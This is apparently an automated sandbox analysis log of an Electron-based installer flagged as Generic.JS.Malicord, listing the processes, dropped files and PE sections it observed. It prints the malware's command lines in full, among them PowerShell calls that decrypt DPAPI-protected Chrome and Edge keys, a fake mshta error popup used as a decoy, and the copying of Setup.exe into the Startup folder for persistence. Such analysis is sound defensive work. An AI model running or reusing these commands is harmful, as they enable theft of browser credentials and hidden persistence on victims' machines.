Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static file information: File size 69193668 > 1048576
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: libGLESv2.dll.0.dr
PE file contains sections with non-standard names
Source: ffmpeg.dll.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr Static PE information: section name: .voltbl
Source: ffmpeg.dll.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr Static PE information: section name: .retplne
Source: libEGL.dll.0.dr Static PE information: section name: .voltbl
Source: libEGL.dll.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr Static PE information: section name: .voltbl
Source: libGLESv2.dll.0.dr Static PE information: section name: _RDATA
Source: Setup.exe.0.dr Static PE information: section name: .00cfg
Source: Setup.exe.0.dr Static PE information: section name: .gxfg
Source: Setup.exe.0.dr Static PE information: section name: .retplne
Source: Setup.exe.0.dr Static PE information: section name: .rodata
Source: Setup.exe.0.dr Static PE information: section name: .voltbl
Source: Setup.exe.0.dr Static PE information: section name: CPADinfo
Source: Setup.exe.0.dr Static PE information: section name: LZMADEC
Source: Setup.exe.0.dr Static PE information: section name: _RDATA
Source: Setup.exe.0.dr Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .voltbl
Source: vk_swiftshader.dll.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr Static PE information: section name: .voltbl
Source: vulkan-1.dll.0.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr Static PE information: section name: .voltbl
Source: ffmpeg.dll0.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr Static PE information: section name: .voltbl
Source: libEGL.dll0.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr Static PE information: section name: .voltbl
Source: libGLESv2.dll0.0.dr Static PE information: section name: _RDATA
Source: Setup.exe0.0.dr Static PE information: section name: .00cfg
Source: Setup.exe0.0.dr Static PE information: section name: .gxfg
Source: Setup.exe0.0.dr Static PE information: section name: .retplne
Source: Setup.exe0.0.dr Static PE information: section name: .rodata
Source: Setup.exe0.0.dr Static PE information: section name: .voltbl
Source: Setup.exe0.0.dr Static PE information: section name: CPADinfo
Source: Setup.exe0.0.dr Static PE information: section name: LZMADEC
Source: Setup.exe0.0.dr Static PE information: section name: _RDATA
Source: Setup.exe0.0.dr Static PE information: section name: malloc_h
Source: Setup.exe.3.dr Static PE information: section name: .00cfg
Source: Setup.exe.3.dr Static PE information: section name: .gxfg
Source: Setup.exe.3.dr Static PE information: section name: .retplne
Source: Setup.exe.3.dr Static PE information: section name: .rodata
Source: Setup.exe.3.dr Static PE information: section name: .voltbl
Source: Setup.exe.3.dr Static PE information: section name: CPADinfo
Source: Setup.exe.3.dr Static PE information: section name: LZMADEC
Source: Setup.exe.3.dr Static PE information: section name: _RDATA
Source: Setup.exe.3.dr Static PE information: section name: malloc_h
Source: 899eff3c-e123-418b-b66d-58d51de99fbd.tmp.node.3.dr Static PE information: section name: _RDATA
Source: 075aadb5-2846-420f-98d8-32c9141ac90f.tmp.node.3.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF846B83588 push ebp; ret 18_2_00007FF846B835B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF846B800BD pushad ; iretd 18_2_00007FF846B800C1
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\nsis7z.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Local\Temp\899eff3c-e123-418b-b66d-58d51de99fbd.tmp.node Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Local\Temp\075aadb5-2846-420f-98d8-32c9141ac90f.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\ffmpeg.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\Setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\ffmpeg.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\resources\elevate.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vulkan-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Local\Temp\899eff3c-e123-418b-b66d-58d51de99fbd.tmp.node Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Local\Temp\075aadb5-2846-420f-98d8-32c9141ac90f.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\LICENSE.electron.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\LICENSE.electron.txt Jump to behavior

Boot Survival
barindex
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
